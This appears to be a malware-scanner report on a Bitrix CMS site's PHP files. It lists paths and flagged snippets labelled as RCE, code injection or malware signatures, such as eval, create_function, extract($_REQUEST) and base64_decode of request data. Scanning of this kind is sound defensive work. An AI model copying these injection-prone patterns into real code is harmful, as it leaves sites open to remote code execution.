Exploit download_remote_code2 Line: 3342 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, "Host: ".$_SERVER["HTTP_HOST"]."\nDate: ".date("Y-m-d H:i:s")
| Exploit execution Line: 3742 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/countries.php")
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(ua) != null)
{
rv = parseFloat(RegExp.$1);
}
}
else if (n.appName == "Netscape")
{
rv = 11;
re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");
if (re.exec(ua) != null)
{
rv = parseFloat(RegExp.$1);
}
}
}
return rv;
}
})(window, document, navigator);
JS;
return '<script type="text/javascript" data-skip-moving="true">'.str_replace(array("\n", "\t"), "", $js)."</script>"; } public static function GetScrip...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/bitrix/index.php Size: 83.00 B Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
| Description | Match |
|---|
Sign 0f37c730 Line: 2 Dangerous Malware Signature (hash: 0f37c730) |
meta http-equiv="REFRESH" content="0;
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/bitrix/coupon_activation.php Size: 16.58 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.post.form/templates/.default/template.php Size: 16.90 kB Created: 2017-11-21 16:20:28 Modified: 2023-06-30 13:57:53 Dangers: 3
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.map/component.php Size: 5.85 kB Created: 2017-05-21 22:21:40 Modified: 2023-06-30 13:57:53 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 157 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$full_path.".section.php")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$CONDITION.";"))) continue; } $search_child = false; $search_path = ''; $full_path = ''; if ($aMenu[1] <> '') { if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $aMenu[1])) { $full_path = $aMenu[1]; } else { $full_path = trim(Rel2Abs(substr($PARENT_PATH, strlen($_SERVER["DOCUMENT_ROOT"])), $aMenu[1])); $slash_pos = strrpos($full_path, "/"); if ($slash_pos !== false) { $page = substr($full_path, $slash_pos+1); if(($pos = strpos($page, '?')) !== false) $page = substr($page,...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.interface.grid/component.php Size: 9.39 kB Created: 2017-05-21 22:21:40 Modified: 2023-06-30 13:57:53 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["name"], $b["name"]);'); uasort($aOptions["views"], $func); $arResult["OPTIONS"] = $aOptions; $arResult["GLOBAL_OPTIONS"] = CUserOptions::GetOption("main.interface", "global", array(), 0); if($arParams["USE_THEMES"]) { if($arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID] <> '') $arResult["GLOBAL_OPTIONS"]["theme"] = $arResult["GLOBAL_OPTIONS"]["theme_template"][SITE_TEMPLATE_ID]; if($arResult["OPTIONS"]["theme"] == '') $arResult["OPTIONS"...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.ui.grid/templates/.default/template.php Size: 31.21 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:53 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(<?=CUtil::phpToJSObject($arResult["DATA_FOR_EDIT"])?>);
var defaultColumns = eval(<?=CUtil::phpToJSObject($arResult["DEFAULT_COLUMNS"])?>);
var Grid = BX.Main.gridManager.getById('<?=$arParams["GRID_ID"]?>');
var messages = eval(<?=CUtil::phpToJSObject($arResult["MESSAGES"])?>);
Grid = Grid ? Grid.instance : null;
if (Grid)
{
Grid.arParams.DEFAULT_COLUMNS = defaultColumns;
Grid.arParams.MESSAGES = messages;
if (action !== 'more')
{
Grid.arParams.EDITABLE_DATA ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/components/bitrix/main.user.link/component.php Size: 19.17 kB Created: 2017-05-21 22:21:40 Modified: 2023-06-30 13:57:53 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard/utils.php Size: 28.74 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard/wizard.php Size: 131.83 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 5
| Description | Match |
|---|
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($handler, '<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")
| Exploit download_remote_code2 Line: 3971 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($handler,
'<'.'?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php")
| Exploit execution Line: 226 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER['DOCUMENT_ROOT'].'/bitrix/license_key.php')
| Exploit execution Line: 2743 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/dbconn.php")
| Exploit execution Line: 44 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcasecmp($a, $b);')); array_unshift($arModules, "main"); return $arModules; } function GetNextStep($currentStep, $currentStepStage, $stepSuccess) { $stepIndex = array_search($currentStep, $this->arSteps); if ($currentStepStage == "utf8") { $nextStep = $currentStep; $nextStepStage = "database"; } elseif ($currentStepStage == "database" && $stepSuccess) { $nextStep = $currentStep; $nextStepStage = "files"; } else { if (!isset($this->arSteps[$stepIndex+1])) retur...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard/template.php Size: 9.12 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard_sol/utils.php Size: 13.62 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 2 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["SORT"], $b["SORT"]);')); return $arWizardTemplates; } function GetTemplatesPath($path) { $templatesPath = $path."/templates"; if (file_exists($_SERVER["DOCUMENT_ROOT"].$templatesPath."/".LANGUAGE_ID)) $templatesPath .= "/".LANGUAGE_ID; return $templatesPath; } function GetServices($wizardPath, $serviceFolder = "", $arFilter = Array()) { $arServices = Array(); $wizardPath = rtrim($wizardPath, "/"); $serviceFolder = rtrim($serviceFolder, "/"); if (LANGU...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("?>".file_get_contents($documentRoot.$pathDir."/.access.php")); } if (!isset($PERM[$pathFile]) || !is_array($PERM[$pathFile])) $arPermisson = $permissions; else $arPermisson = $permissions + $PERM[$pathFile]; return $GLOBALS["APPLICATION"]->SetFileAccessPermission($originalPath, $arPermisson); } function AddMenuItem($menuFile, $menuItem, $siteID, $pos = -1) { if (CModule::IncludeModule('fileman')) { $arResult = CFileMan::GetMenuArray($_SERVER["DOCUMENT_ROOT"].$menuFile); $arMenuItems = $arR...
| Sign 11413268 Line: 313 Dangerous Malware Signature (hash: 11413268) |
eval("?>
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/wizard_sol/template.php Size: 9.27 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/probki/index.php Size: 98.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/probki/.parameters.php Size: 102.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/probki/.description.php Size: 142.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/admin_security/index.php Size: 4.50 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:53 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/weather/index.php Size: 99.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/weather/.parameters.php Size: 103.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/weather/.description.php Size: 143.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/gadgets/bitrix/admin_info/index.php Size: 2.18 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:53 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/profile.php Size: 29.00 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 7 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_POST, EXTR_SKIP)
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/map/default.php Size: 13.58 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Warns: 1 Dangers: 6
| Description | Match |
|---|
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$PARENT_PATH..trim($cmenu)
| Exploit execution Line: 203 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$child_menu)
| Exploit execution Line: 209 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$PARENT_PATH.".".trim($cmenu)
| Exploit execution Line: 341 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$main_menu)
| Exploit extract_global Line: 14 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
| Exploit silenced_eval Line: 220 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval("return ".$CONDITION.";")
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return ".$CONDITION.";"))) continue; } if (strlen($aMenu[1])>0) { $search_child = true; if(preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $aMenu[1])) $full_path = $aMenu[1]; else $full_path = trim(Rel2Abs($PARENT_PATH, $aMenu[1])); } else { $search_child = false; $full_path = $PARENT_PATH; } if (strlen($full_path)>0) { $FILE_ACCESS = (preg_match("'^(([A-Za-z]+://)|mailto:|javascript:)'i", $full_path)) ? "R" : $APPLICATION->GetFileAccessPermission($full_path); if ($FILE_ACCESS!="D" ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/change_password.php Size: 3.49 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/forgot_password.php Size: 2.54 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/registration.php Size: 6.25 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/authorize_registration.php Size: 6.90 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/install/templates/main/auth/authorize.php Size: 3.79 kB Created: 2017-05-21 22:21:39 Modified: 2023-06-30 13:57:53 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 2 Dangerous Code Injection, extracting global var arrays, allow remote attackers to inject PHP code on the target machine via HTTP request |
extract($_REQUEST, EXTR_SKIP)
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/ru/admin/site_checker.php Size: 81.03 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 92 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/classes/general/update_update.php Size: 22.66 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT_ALT"] = "Download source code"; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_SITES_PROMT"] = "You cannot create more than #NUM# site#END# using this kernel according to your license. If you need more sites, you can buy them any time. After you have purchased the additional sites, you will have to add them to the system."; $MESS["SUP_SITES_AC...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/classes/general/update_update5.php Size: 25.89 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of wesbsites using this product installation."; $MESS["SUP_CHECK_PROMT_1"] = "You can extend your period of technical support, purchase additi...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/classes/general/update_client.php Size: 24.45 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of websites using this product installation."; $MESS["SUP_CHECK_PROMT_21"] = "You can add unlimited number of users for the current product co...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/admin/site_checker.php Size: 51.25 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 92 Dangerous Malware Signature (hash: 471b95ee) |
suhosin
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/admin/update_system.php Size: 15.12 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function system Warning Potentially dangerous function `system` [https://www.php.net/system] |
system (in other words, no updates may be available). If any of the module updates are available, please install them first."; $MESS["SUP_SUBS_BUTTON"] = "Download source code"; $MESS["SUP_SUPPORT_BUTTON"] = "Reload All Files"; $MESS["SUP_INITIAL"] = "Initialising..."; $MESS["SUP_SUBS_SUCCESS"] = "The source code has been downloaded successfully"; $MESS["SUP_SUPPORT_SUCCESS"] = "Files has been downloaded successfully."; $MESS["SUP_SUBS_MED"] = "Downloaded source code for"; $MESS["SUP_SUPPORT_MED...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/start.php Size: 12.83 kB Created: 2017-11-21 16:20:30 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/epilog_main_admin.php Size: 4.07 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/admin_lib.php Size: 58.58 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 443 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/admin/.left.menu.php")
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcasecmp($a["ID"], $b["ID"]);')); return $aThemes; } public static function GetCurrentTheme() { $aUserOpt = CUserOptions::GetOption("global", "settings"); if($aUserOpt["theme_id"] <> "") { $theme = preg_replace("/[^a-z0-9_.-]/i", "", $aUserOpt["theme_id"]); if($theme <> "") { return $theme; } } return ".default"; } } class CAdminUtil { public static function dumpVars($vars, $arExclusions = array()) { $result = ""; if (is_array($vars)) { foreach ($vars as $varN...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/prolog_main_admin.php Size: 15.84 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 3
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/admin_list.php Size: 38.62 kB Created: 2017-11-21 16:20:30 Modified: 2023-06-30 13:57:54 Warns: 2
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["__sort"] == $b["__sort"]) return 0; return ($a["__sort"] < $b["__sort"])? -1 : 1;')); } foreach($this->aHeaders as $id=>$arHeader) { if(in_array($id, $this->arVisibleColumns)) $this->aVisibleHeaders[$id] = $arHeader; } if (isset($_REQUEST["mode"]) && $_REQUEST["mode"] == "settings") $this->ShowSettings($aAllCols, $aCols, $aOptions); } function ShowSettings($aAllCols, $aCols, $aOptions) { global $USER; require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/inclu...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(this.form.action[this.form.action.selectedIndex].getAttribute('custom_action'));return false;}" disabled="disabled" class="adm-table-action-button" />
<? endif; ?>
<span class="adm-table-counter" id="<?=$this->table_id?>_selected_count"><?=GetMessage('admin_lib_checked')?>: <span>0</span></span>
<? endif; ?>
</div>
<? } public function DisplayList($arParams = array()) { $menu = new CAdminPopup($this->table_id."_menu", $this->table_id."_menu"); $menu->Show(); if( (isset($_REQUEST['ajax_debu...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/prolog_auth_admin.php Size: 2.90 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/epilog_jspopup_admin.php Size: 221.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/epilog_auth_admin.php Size: 1.56 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/lang_files.php Size: 3.48 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/auth/wrapper.php Size: 5.87 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/probki/index.php Size: 98.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/probki/.parameters.php Size: 102.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/probki/.description.php Size: 142.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/admin_security/index.php Size: 4.50 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:50 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/index.php Size: 99.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/.parameters.php Size: 103.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/.description.php Size: 143.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/city.php Size: 96.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/admin_info/index.php Size: 2.18 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/tools/vote/vote_chart.php Size: 448.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/managed_cache/MYSQL/e5/e56397d99b3a76ae3f02219877fed2c7.php Size: 13.32 kB Created: 2024-03-04 15:30:54 Modified: 2024-03-04 15:30:54 Dangers: 1
| Description | Match |
|---|
Sign b236d073 Line: 5 Dangerous Malware Signature (hash: b236d073) |
/*;*/
|
|
/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/lib/entity/query.php Size: 75.80 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->is_executing = true; $query = $this->buildQuery(); $cacheId = ""; $ttl = 0; $result = null; if($this->cacheTtl > 0 && (empty($this->join_map) || $this->cacheJoins == true)) { $ttl = $this->entity->getCacheTtl($this->cacheTtl); } if($ttl > 0) { $cacheId = md5($query); $result = $this->entity->readFromCache($ttl, $cacheId, $this->countTotal); } if($result === null) { $result = $this->query($query); if($ttl > 0) { $result = $this->entity->writeToCache($result, $cacheId, $this->count...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/lib/composite/responder.php Size: 18.28 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/include.php Size: 22.67 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 2
| Description | Match |
|---|
Sign 99fc3b9d Line: 101 Dangerous Malware Signature (hash: 99fc3b9d) |
$GLOBALS['____
| Sign d97f004d Line: 101 Dangerous Malware Signature (hash: d97f004d) |
ZGVmaW5l
|
|
/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/classes/general/user.php Size: 138.93 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/classes/general/controller_member.php Size: 41.85 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 1076 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
base64_decode($_REQUEST['parameters'])
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($disconnect_command); COption::SetOptionString("main", "controller_member", "N"); } public static function GetBackup($bRefresh = false) { static $arCachedData; if(!isset($arCachedData) || $bRefresh) $arCachedData = unserialize(COption::GetOptionString("main", "~controller_backup", "")); return $arCachedData; } public static function SetBackup($arBackup) { COption::SetOptionString("main", "~controller_backup", serialize($arBackup)); CControllerClient::GetBackup(true); } public static functio...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/admin/user_admin.php Size: 23.85 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 69 Warning Double var technique is usually used for the obfuscation of malicious code |
${$f}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/tools.php Size: 166.27 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit download_remote_code2 Line: 3342 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($fp, "Host: ".$_SERVER["HTTP_HOST"]."\nDate: ".date("Y-m-d H:i:s")
| Exploit execution Line: 3742 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/countries.php")
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec(ua) != null)
{
rv = parseFloat(RegExp.$1);
}
}
else if (n.appName == "Netscape")
{
rv = 11;
re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");
if (re.exec(ua) != null)
{
rv = parseFloat(RegExp.$1);
}
}
}
return rv;
}
})(window, document, navigator);
JS;
return '<script type="text/javascript" data-skip-moving="true">'.str_replace(array("\n", "\t"), "", $js)."</script>"; } public static function GetScrip...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/install/gadgets/bitrix/admin_security/index.php Size: 4.50 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/coupon_activation.php Size: 16.58 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:42 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/bitrix/catalog/catalog/section.php Size: 2.36 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/core/Loader.php Size: 29.86 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
